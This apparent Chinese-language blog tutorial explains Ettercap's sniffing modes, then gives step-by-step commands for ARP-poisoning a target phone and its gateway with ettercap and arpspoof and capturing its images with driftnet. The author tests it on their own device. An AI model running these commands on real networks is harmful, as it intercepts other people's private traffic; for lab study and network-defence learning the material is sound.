原理
Ettercap最初設計爲交換網上的sniffer,但是隨着發展,它獲得了越來越多的功能,成爲一款有效的、靈活的中介攻擊工具。它支持主動及被動的協議解析幷包含了許多網絡和主機特性(如OS指紋等)分析。
Ettercap的運行方式歸納爲UNIFIED和BRIDGED兩種。
- UNIFIED的方式是以中間人方式嗅探;
- BRIDGED方式是在雙網卡情況下,嗅探兩塊網卡之間的數據包。
UNIFIED方式的大致原理爲同時欺騙A和B,將本要發給對方的數據包發送到第三者C上,然後由C再轉發給目標,C充當了一箇中間人的角色。因爲數據包會通過C那裏,所以C可以對數據包進行分析處理,導致了原本只屬於A和B的信息泄露給了C。UNIFIED方式將完成以上欺騙並對數據包分析。Ettercap劫持的是A和B之間的通信,在Ettercap看來,A和B的關係是對等的。
如前所述,BRIDGED方式是在雙網卡情況下,嗅探兩網卡設備之間的數據包。在實際應用中不常用,我們最爲常用的就是UNIFIED方式,UNIFIED方式的運行參數爲-M(M是MITM的首字母,即爲中間人攻擊的縮寫)。
步驟
1、掃描目標主機
nmap 192.168.1.1
2、開啓IP轉發
echo 1 > /proc/sys/net/ipv4/ip_forward
3、首先切換到root賬戶
sudo su
4、(1)圖形界面形式
ettercap -G
詳細步驟可見我之前的bloghttps://blog.csdn.net/ghl1390490928/article/details/81233856
- 選擇sniff-Unified,這裏選擇我們的網卡wlan0,然後點擊OK;
-
點擊Hosts,首先選擇Scan for hosts,掃描一下局域網裏面主機,然後我們在點擊Hosts裏面的Hosts list;
-
拿我手機做測試,IP地址 192.168.1.6和網關192.168.1.1,並分別添加到Target1和Target2;
-
接下來,我們選擇Mitm-ARP poisoning
-
選擇Sniff remote connections。設置完後,直接Start
(2)命令行形式
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
開啓新的shell
ettercap -Tq -i wlan0
5、開啓新的shell
輸入:
driftnet -i wlan0
等待獲取圖片。這裏介紹幾個參數:
● -i 監聽網卡
● -b 聲音提醒
● -a 保存圖片(這樣的話圖片不會顯示在窗口)
● -d 圖片保存目錄,例:driftnet -i wlan0 -b -a -d /pic
實驗測試
我在手機打開今日頭條刷新聞
然後在driftnet小窗口截獲到數據流裏的圖片